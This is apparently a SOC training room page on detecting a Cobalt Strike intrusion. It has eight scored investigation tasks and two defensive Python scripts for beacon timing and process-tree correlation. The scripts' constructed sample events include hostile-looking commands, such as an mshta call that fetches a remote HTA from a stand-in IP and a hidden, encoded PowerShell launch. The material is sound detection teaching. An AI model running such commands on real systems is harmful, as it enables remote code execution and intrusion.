
Cobalt Strike: Beacon Detection
In this scenario, a threat actor has gained a foothold in a corporate environment. You will act as a SOC analyst tasked with identifying the initial infection vector, tracing lateral movement, and uncovering the final objectives of the intrusion. The room focuses on detecting Cobalt Strike beacons that use malleable C2 profiles, recognising process injection patterns, and spotting the deployment of LockBit ransomware. You will use SIEM logs and XDR telemetry to reconstruct the attack timeline and identify the critical Indicators of Compromise (IOCs).
Requires a Pro subscription.
Investigation Tasks
Complete each task by investigating alerts and submitting your findings.
Find the LOLBin That Launched the Intrusion (10 points)
CORP-WEB-01 runs a public-facing Confluence server, and exploitation of CVE-2023-22527 against it gave the attacker code execution as SYSTEM. The first stage abused a signed, built-in Windows utility to download and run a remote HTA payload. Trace the process chain under the Confluence web process and identify the legitimate Microsoft binary the attacker repurposed for that initial execution.
Pin Down the Command-and-Control Destination (10 points)
Moments after the HTA payload ran, the compromised CORP-WEB-01 host reached out to attacker-controlled infrastructure to establish its beacon. Having confirmed how the initial execution happened, your next step is to scope the C2 channel. Review the XDR Network Events for the outbound connection that left the host right after that first-stage execution and identify the external destination it called home to.
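Beyond matching the timestamp, a destination that a beacon genuinely calls home to also shows up as regular, low-variance check-ins: Cobalt Strike reduces each sleep by a bounded random fraction, and a malleable profile pins those values with `sleeptime` and `jitter`, so the gaps between connections cluster tightly while interactive traffic to a website does not. The interval analysis below is an added example, not code or data from this room: the connection records are constructed, the hostname and documentation-range IPs are assumptions, and the 0.3 jitter-ratio threshold is an illustrative starting point rather than a tuned value.

```python
# Added example (not the room's code or data): interval analysis of outbound
# connections to spot beacon-like timing. The connection records are
# constructed; the destination IPs are documentation addresses, not IOCs.
from collections import defaultdict
from datetime import datetime, timedelta
from statistics import mean, pstdev


def series(start, gaps_s):
    """Turn a list of inter-connection gaps (seconds) into timestamps."""
    stamps, t = [start], start
    for g in gaps_s:
        t += timedelta(seconds=g)
        stamps.append(t)
    return stamps


T0 = datetime(2024, 3, 1, 9, 14, 6)
# A 60 s sleep with 20 % jitter: every gap lands in [48, 60] s.
BEACON_GAPS = [52, 58, 49, 60, 55, 51, 57, 53, 59, 50]
# Interactive browsing to one site: gaps vary by orders of magnitude.
BROWSE_GAPS = [3, 120, 7, 900, 15, 2, 400, 60, 1800, 5]
# Constructed network events: (ts, src_host, dst_ip, dst_port).
EVENTS = ([(t, "CORP-WEB-01", "203.0.113.45", 443) for t in series(T0, BEACON_GAPS)]
          + [(t, "CORP-WEB-01", "198.51.100.7", 443) for t in series(T0, BROWSE_GAPS)])


def score_flow(timestamps, min_connections=8):
    """Mean gap and jitter ratio (stdev / mean) for one (src, dst, port) flow.

    Cobalt Strike's jitter is a bounded, uniform reduction of the sleep, so a
    real beacon keeps this ratio small. Returns None when there are too few
    connections to judge, or when every connection shares one timestamp (a
    burst, not a beacon).
    """
    if len(timestamps) < min_connections:
        return None
    stamps = sorted(timestamps)
    gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
    m = mean(gaps)
    if m == 0:
        return None
    return {"connections": len(stamps),
            "mean_interval": m,
            "jitter_ratio": pstdev(gaps) / m}


def find_beacons(events, max_jitter_ratio=0.3, min_connections=8):
    """Group connections per flow and keep the ones with beacon-like timing."""
    flows = defaultdict(list)
    for ts, src, dst, port in events:
        flows[(src, dst, port)].append(ts)
    hits = {}
    for flow, stamps in flows.items():
        score = score_flow(stamps, min_connections)
        if score is not None and score["jitter_ratio"] <= max_jitter_ratio:
            hits[flow] = score
    return hits


if __name__ == "__main__":
    for flow, score in find_beacons(EVENTS).items():
        print(flow, score)
```

Treat a low jitter ratio as a triage signal rather than a verdict: NTP, update agents and monitoring probes also check in on a fixed schedule, so pair the flow with the process lineage that opened it. Long sleep times need a correspondingly long collection window before `min_connections` is reached, and because a malleable profile can set any `sleeptime` and `jitter`, the threshold should be tuned against your own baseline.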
Fingerprint the In-Memory PowerShell Stage (5 points)
With the C2 channel mapped, you need to characterise what the beacon actually ran. On CORP-WEB-01 the LOLBin you identified spawned a hidden PowerShell process that carried the next stage of the intrusion. To support detection-engineering and threat-intel enrichment, pivot into the XDR Process Tree, locate that PowerShell node in the chain, and record the file hash the EDR captured for it.
Catch the Tooling Dropped to Disk (5 points)
The in-memory stage gave the attacker hands-on access, and they began pulling additional tooling onto CORP-WEB-01. During one session the host made an outbound HTTP request to a suspicious external server, and shortly afterward an unrecognised binary appeared in a temporary directory. Work the SIEM event messages for that session and identify the name of the file that was written to the host.
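The first four tasks are one correlation exercise: walk the process tree down from the Confluence web process, take the first external connection the chain makes, read the hash off the hidden PowerShell child, then match a later HTTP request against a file-create in a Temp directory. The script below is an added example that is not part of this room and does not use its data: the Sysmon-style events, PIDs, image paths, hashes and documentation-range IPs are all constructed assumptions, and `mshta.exe` appears in the sample only because it is the usual host for HTA files, not because the page names it.

```python
# Added example (not the room's code or data): correlation logic for tasks 1-4
# over constructed Sysmon-style events. Every PID, path, hash and IP is assumed.
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network
from ntpath import basename


def T(clock):
    return datetime.fromisoformat("2024-03-01T" + clock)


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Process-creation events (Sysmon EID 1 shape). pid 4120 stands in for the
# Confluence Tomcat JVM; its image path is an assumption.
PROCS = [
    {"pid": 4120, "ppid": 800, "image": r"C:\Confluence\jre\bin\java.exe",
     "cmd": "java.exe -Dcatalina.base=C:\\Confluence", "hash": "A0A0", "ts": T("08:00:00")},
    {"pid": 5012, "ppid": 4120, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": "cmd.exe /c mshta http://203.0.113.45/s.hta", "hash": "C2C2", "ts": T("09:14:02")},
    {"pid": 5020, "ppid": 5012, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": "mshta http://203.0.113.45/s.hta", "hash": "D3D3", "ts": T("09:14:03")},
    {"pid": 5044, "ppid": 5020, "image": PS,
     "cmd": "powershell -nop -w hidden -enc SQBFAFgA", "hash": "E4E4", "ts": T("09:14:04")},
    {"pid": 5100, "ppid": 800, "image": PS,  # unrelated, visible PowerShell
     "cmd": "powershell -File C:\\Scripts\\backup.ps1", "hash": "F5F5", "ts": T("09:14:10")},
]
NET = [  # (ts, pid, dst_ip, dst_port)
    (T("09:14:03"), 5020, "203.0.113.45", 80),    # HTA fetch by the LOLBin
    (T("09:14:06"), 5044, "203.0.113.45", 443),   # beacon check-in
    (T("09:14:12"), 5100, "10.0.0.5", 443),       # ordinary internal traffic
    (T("09:31:12"), 5044, "198.51.100.9", 80),    # later tooling download
]
FILES = [  # (ts, pid, path)
    (T("09:31:14"), 5044, r"C:\Users\Administrator\AppData\Local\Temp\update.exe"),
    (T("09:32:00"), 5100, r"C:\Windows\Temp\backup.log"),
]
INTERNAL = [ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_internal(ip):
    return any(ip_address(ip) in net for net in INTERNAL)


def children(procs, ppid):
    return [p for p in procs if p["ppid"] == ppid]


def descendants(procs, root_pid):
    """Every process under root_pid (root excluded), oldest first."""
    found, stack = [], [root_pid]
    while stack:
        for child in children(procs, stack.pop()):
            found.append(child)
            stack.append(child["pid"])
    return sorted(found, key=lambda p: p["ts"])


def find_hta_lolbin(procs, web_pid):
    """Task 1: innermost process under the web server whose command line carries
    a remote .hta; outer shells such as cmd.exe only pass the command through."""
    cands = [p for p in descendants(procs, web_pid)
             if "://" in p["cmd"] and ".hta" in p["cmd"].lower()]
    pids = {p["pid"] for p in cands}
    for p in cands:
        if not any(c["pid"] in pids for c in children(procs, p["pid"])):
            return p
    return None


def first_external_after(net, chain_pids, start, window_s=60):
    """Task 2: first non-RFC1918 destination the chain reached within window_s."""
    end = start + timedelta(seconds=window_s)
    for ts, pid, dst, port in sorted(net):
        if pid in chain_pids and start <= ts <= end and not is_internal(dst):
            return dst, port
    return None


def hidden_powershell_hash(procs, lolbin_pid):
    """Task 3: hash of the hidden-window PowerShell spawned under the LOLBin."""
    for p in descendants(procs, lolbin_pid):
        cmd = p["cmd"].lower()
        if basename(p["image"]).lower() == "powershell.exe" and (
                "-w hidden" in cmd or "-windowstyle hidden" in cmd):
            return p["hash"]
    return None


def dropped_after_http(net, files, chain_pids, window_s=30):
    """Task 4: Temp-directory files the chain wrote within window_s of its own
    outbound HTTP request. The in-memory HTA fetch at 09:14:03 matches nothing."""
    hits = []
    for ts, pid, dst, port in net:
        if pid not in chain_pids or port != 80 or is_internal(dst):
            continue
        for fts, fpid, path in files:
            if (fpid in chain_pids and "\\temp\\" in path.lower()
                    and ts <= fts <= ts + timedelta(seconds=window_s)):
                hits.append((dst, basename(path)))
    return hits


def investigate(procs=PROCS, net=NET, files=FILES, web_pid=4120):
    """Run the four steps in order and return one finding per task."""
    lolbin = find_hta_lolbin(procs, web_pid)
    if lolbin is None:
        return None
    chain = {lolbin["pid"]} | {p["pid"] for p in descendants(procs, lolbin["pid"])}
    return {"lolbin": basename(lolbin["image"]),
            "c2": first_external_after(net, chain, lolbin["ts"]),
            "stage_hash": hidden_powershell_hash(procs, lolbin["pid"]),
            "dropped": dropped_after_http(net, files, chain)}
```

Two details carry over to real telemetry. First, the LOLBin is the innermost process carrying the HTA URL, not the first one: `cmd.exe /c` shows the same command line, so matching on the string alone would name the wrong binary. Second, PowerShell accepts abbreviated switches (`-w`, `-win`, `-window`), so a production rule should normalise them and decode the `-enc` payload rather than match two spellings; the 60 s and 30 s windows here are also illustrative and need tuning to the clock skew between your SIEM and EDR sources.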
Hash the Executed Payload (5 points)
One of the binaries the attacker staged on CORP-WEB-01 was run from the Administrator's Temp directory through cmd.exe. The same payload name shows up more than once in the logs, so you will need to isolate the specific execution that matters before you enrich it. Review the SIEM process-creation logs, pin down that execution event, and record the file hash captured for the payload.
Trace Credential Harvesting on the Backup Server (5 points)
After establishing their foothold, the adversary moved toward the backup infrastructure on corp-bkp-01, using a service account to hunt for administrative credentials. Backup servers are a prized target because they hold keys to the wider estate. Examine the XDR timeline for the PowerShell activity tied to that service account and identify the script that was run to extract credentials from the backup software.
Identify the Exfiltration Tool (5 points)
With credentials in hand, the attacker turned to moving data out of the estate and staged a third-party transfer utility to copy a sensitive file share to cloud storage. Before you can block and hunt for this tool, you need a reliable identifier for it. Work through the XDR Process Tree, locate the process responsible for the bulk copy, and record the file hash captured for that binary.
Scope Where the Stolen Data Went (5 points)
You have identified the transfer utility the attacker used; the final step is to determine where the data actually went so the destination can be blocked and reported. That tool, running on CORP-FILE-01, pushed a large volume of data out of the environment in a single transfer. Review the XDR Network Events for the outbound connection it opened and identify the external destination that received the unauthorised upload.
8 tasks · 50 points total
Skills You'll Build
Requires foundational alert-triage skills; you will need to correlate multiple data sources.
Prerequisites
- Basic understanding of security alerts
- Familiarity with SIEM concepts
- Familiarity with XDR concepts
More Operations
Credential Harvesting: The Lookalike Login
Investigate an adversary-in-the-middle (AiTM) credential phishing campaign that lured an employee to a lookalike Microsoft 365 login page. Working entirely from SIEM logs, you will identify the lookalike domain, reconstruct the multi-hop redirect chain through a compromised legitimate site, uncover a secondary phishing wave against another employee, and confirm account takeover in Azure AD sign-in logs via impossible travel and session-token replay. You finish by choosing the containment action that actually evicts an attacker holding a valid session token. Foundational skills for SOC analysts in lookalike-domain analysis and identity-centric incident response.
QR Code Phishing: Scan to Compromise
In this scenario, you will investigate a modern 'Quishing' (QR phishing) attack that bypassed traditional email filters by hiding its payload inside an image. You will trace the full chain: a spoofed MFA-enrollment lure sent from purpose-built infrastructure, a redirect server that conceals the final destination, and an Evilginx-style adversary-in-the-middle page that stole an authenticated session cookie despite MFA. You will then follow the attacker's post-compromise moves — Graph API mailbox enumeration, SharePoint exfiltration, and a hidden inbox forwarding rule — and choose the containment action that actually evicts them.
ClickFix: The Fake CAPTCHA Trap
The ClickFix social engineering technique uses dialogue boxes containing fake error messages to trick victims into copying, pasting, and running malicious content. In this scenario, a user was targeted with a 'Verify You Are Human' CAPTCHA check that led to a significant endpoint compromise. You will analyze the 'paste-and-run' execution chain, investigate PowerShell activity initiated via the Windows Run dialog, and identify the deployment of an information stealer.